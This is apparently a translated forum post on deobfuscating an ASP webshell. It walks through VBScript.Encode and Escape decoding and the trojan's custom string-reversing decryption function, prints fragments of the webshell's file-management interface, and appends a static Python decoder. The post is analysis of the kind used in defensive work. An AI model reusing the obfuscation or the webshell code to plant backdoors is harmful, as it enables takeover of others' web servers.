Finding the decryption function in ASP trojan files

Source: Internet
Author: User

Today's demonstration uses zzzhk's trojan. His trojan backdoor is also the best.

First, we can see <%@ LANGUAGE = VBScript.Encode %>, which means the script has been encoded.

Then we use an ASP decoding tool; a Baidu search turns up a bunch of them.

Note that when decoding, the character "X" will be removed from the semi-automated exit mode. Solution: replace the character "X" with a symbol such as "X ".

Then open the tool.

Decode the file, then copy the result and save it as 1.asp.

Next, find the custom decryption function.

The content is encoded with Escape; search Baidu for an UnEscape tool to decode it.

RRS "<script language = javascript> function killErrors () {return true;} window. onerror = killErrors ;"
RRS "function yesok () {if (confirm (" "Are you sure you want to perform this operation ?" ") Return true; else return false ;}"
RRS "function ShowFolder (Folder) {top. addrform. FolderPath. value = Folder; top. addrform. submit ();}"
RRS "function FullForm (FName, FAction) {top. hideform. FName. value = FName; if (FAction = "" CopyFile "") {DName = prompt. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" MoveFile "") {DName = prompt ("" Please input _ move _ to the target file _ all _ name_name "", FName); top. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" CopyFolder "") {DName = prompt ("" Please enter _ all _ name_name "", FName); top. hideform. FN Ame. value + = "" | "" + DName;} else if (FAction = "" MoveFolder "") {DName = prompt ("" Please enter _ all _ name_name "", FName); top. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" NewFolder "") {DName = prompt ("" Please enter the folder to be created _ all _ name_name "", FName); top. hideform. FName. value = DName;} else if (FAction = "" CreateMdb "") {DName = prompt ("" Please enter the name of the Mdb file to be created _ all _ name_name, note that the name cannot be the same!" ", FName); top. hideform. FName. value = DName;} else if (FAction = "" CompactMdb "") {DName = prompt ("enter the name of the Mdb file to be compressed _ all _ name_name, check whether the file exists!" ", FName); top. hideform. FName. value = DName;} else {DName =" "Other" ";} if (DName! = Null) {top. hideform. action. value = FAction; top. hideform. submit ();} else {top. hideform. FName. value = ";}}""

The result is displayed.

Search for execute AAAA("xxxxxxxxxxxxxxxxxxxx") and you will find a bunch of them... so next we look for the decryption function.

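Function AAAA(objstr)
    ' Restore the double quotes that were swapped for a placeholder token
    objstr = Replace(objstr, "delimiter ", """")
    For i = 1 To Len(objstr)
        If Mid(objstr, i, 1) <> "Ω" Then
            ' Prepending each character reverses the string
            NewStr = Mid(objstr, i, 1) & NewStr
        Else
            ' "Ω" marks a line break
            NewStr = vbCrLf & NewStr
        End If
    Next
    AAAA = NewStr
End Function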

You can put this function directly into VB.

Take the content between the quotes, "XXXXXXXXXXXXXXXXXX", in execute AAAA("XXXXXXXXXXXXXXXXXX") and pass it to the function.

Repeat for the rest... That is the general idea.
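The same decoding can be done statically, without running any of the trojan's code. The following Python script is an added example, not part of the original post: it reimplements AAAA as shown above and decodes every execute AAAA("...") argument as plain data. The names aaaa_decode and decode_execute_calls and the sample input are constructed for illustration, and the quote placeholder is copied as it appears on this page.

```python
import re

# Token and marker exactly as they appear in the function shown on this page.
# Assumption: in a real sample the quote placeholder may be a different string.
QUOTE_TOKEN = "delimiter "
NEWLINE_MARK = "Ω"


def aaaa_decode(objstr, quote_token=QUOTE_TOKEN):
    """Static equivalent of AAAA(): restore quotes, map Ω to CRLF, reverse."""
    restored = objstr.replace(quote_token, '"')
    units = ["\r\n" if ch == NEWLINE_MARK else ch for ch in restored]
    return "".join(reversed(units))  # each CRLF stays intact as one unit


def decode_execute_calls(asp_source, func_name="AAAA"):
    """Find execute <func_name>("...") calls and decode each argument as data."""
    pattern = re.compile(
        r'execute\s+' + re.escape(func_name) + r'\s*\(\s*"((?:[^"]|"")*)"\s*\)',
        re.IGNORECASE,
    )
    decoded = []
    for match in pattern.finditer(asp_source):
        # Inside a VBScript string literal, "" is an escaped double quote.
        literal = match.group(1).replace('""', '"')
        decoded.append(aaaa_decode(literal))
    return decoded


# Constructed sample, not taken from any real file: two harmless payloads.
SAMPLE = (
    'Dim k\n'
    'execute AAAA ("2 = yΩdelimiter adelimiter  = x")\n'
    'Execute AAAA("b""a")\n'
)

if __name__ == "__main__":
    for i, text in enumerate(decode_execute_calls(SAMPLE), 1):
        print(f"--- payload {i} ---")
        print(text)
```

Because the argument is only ever treated as a string, nested layers can be peeled by feeding each decoded payload back into decode_execute_calls.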

Okay. I'll write more another day. If you don't understand it, please leave a message... Don't laugh.

Source: Network Security

 
